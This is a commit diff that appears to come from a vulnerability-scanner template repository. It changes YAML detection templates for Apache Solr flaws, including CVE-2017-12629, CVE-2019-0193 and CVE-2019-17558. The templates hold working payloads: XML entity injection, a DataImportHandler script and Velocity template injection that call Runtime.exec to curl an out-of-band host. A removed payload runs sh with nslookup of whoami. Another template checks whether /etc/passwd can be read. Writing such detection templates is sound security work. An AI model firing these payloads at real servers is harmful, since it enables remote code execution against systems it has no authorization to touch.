commit
99f71a941c
|
@ -1,26 +1,36 @@
|
|||
id: CVE-2017-12629
|
||||
|
||||
info:
|
||||
name: Apache Solr <= 7.1 Remote Code Execution via SSRF
|
||||
name: Apache Solr <= 7.1 XML entity injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
tags: cve,cve2017,solr,apache,rce,ssrf,oob
|
||||
tags: cve,cve2017,solr,apache,oob,xxe
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2017-12629
|
||||
- https://twitter.com/honoki/status/1298636315613974532/photo/1
|
||||
- https://twitter.com/honoki/status/1298636315613974532
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-XXE
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2017-12629-RCE
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /solr/select?qt=%2Fconfig%2523%26&shards=127.0.0.1:8984/solq&stream.body=%7B%22add-listener%22%3A%7B%22event%22%3A%22postCommit%22%2C%22name%22%3A%22nuclei%22%2C%22class%22%3A%22solr.RunExecutableListener%22%2C%22exe%22%3A%22sh%22%2C%22dir%22%3A%22%2Fbin%2F%22%2C%22args%22%3A%5B%22-c%22%2C%22%24%40%7Csh%22%2C%22.%22%2C%22echo%22%2C%22nslookup%22%2C%22%24%28whoami%29.{{interactsh-url}}%22%5D%7D%7D&wt=json&isShard=true&q=apple HTTP/1.1
|
||||
GET /solr/admin/cores?wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /solr/select?shards=127.0.0.1:8984/solr/update%23&commit=true HTTP/1.1
|
||||
GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the DNS Interaction
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "dns"
|
||||
- "http"
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
|
@ -0,0 +1,47 @@
|
|||
id: CVE-2019-0193
|
||||
|
||||
info:
|
||||
name: Apache Solr - DataImportHandler RCE
|
||||
description: In Apache Solr, the DataImportHandler, an optional but popular module to pull in data from databases and other sources, has a feature in which the whole DIH configuration can come from a request's "dataConfig" parameter. The debug mode of the DIH admin screen uses this to allow convenient debugging / development of a DIH config. Since a DIH config can contain scripts, this parameter is a security risk. Starting with version 8.2.0 of Solr, use of this parameter requires setting the Java System property "enable.dih.dataConfigParam" to true.
|
||||
author: pdteam
|
||||
severity: critical
|
||||
refrense: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-0193
|
||||
- https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193
|
||||
- https://paper.seebug.org/1009/
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /solr/admin/cores?wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
- |
|
||||
POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-type: application/x-www-form-urlencoded
|
||||
X-Requested-With: XMLHttpRequest
|
||||
|
||||
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20http://{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,7 @@ info:
|
|||
author: pikpikcu,madrobot
|
||||
severity: critical
|
||||
refrense: https://nvd.nist.gov/vuln/detail/CVE-2019-17558
|
||||
tags: cve,cve2019,apache,rce,solr
|
||||
tags: cve,cve2019,apache,rce,solr,oob
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -15,15 +15,10 @@ requests:
|
|||
Connection: close
|
||||
|
||||
- |
|
||||
POST /solr/{{collection}}/config HTTP/1.1
|
||||
POST /solr/{{core}}/config HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: close
|
||||
Content-Type: application/json
|
||||
Content-Length: 259
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
{
|
||||
"update-queryresponsewriter": {
|
||||
|
@ -37,25 +32,25 @@ requests:
|
|||
}
|
||||
|
||||
- |
|
||||
GET /solr/{{collection}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27nslookup%20example.com%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||
GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20http://{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol # Confirms the HTTP Interaction
|
||||
words:
|
||||
- "http"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
name: collection
|
||||
group: 1
|
||||
internal: true
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Non-authoritative answer"
|
||||
- "example.com"
|
||||
condition: and
|
||||
name: core
|
||||
group: 1
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
|
|
@ -26,13 +26,14 @@ requests:
|
|||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
|
|
|
@ -18,6 +18,7 @@ requests:
|
|||
- type: word
|
||||
words:
|
||||
- '<title>Solr admin page</title>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
|
|
@ -24,18 +24,21 @@ requests:
|
|||
Accept-Language: en
|
||||
Connection: close
|
||||
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
regex:
|
||||
- '"status"\:\{"(.*?)"\:\{"name"'
|
||||
internal: true
|
||||
name: core
|
||||
group: 1
|
||||
internal: true
|
||||
regex:
|
||||
- '"name"\:"(.*?)"'
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'regex("root:.*:0:0:", body_2)'
|
||||
condition: and
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
Loading…
Reference in New Issue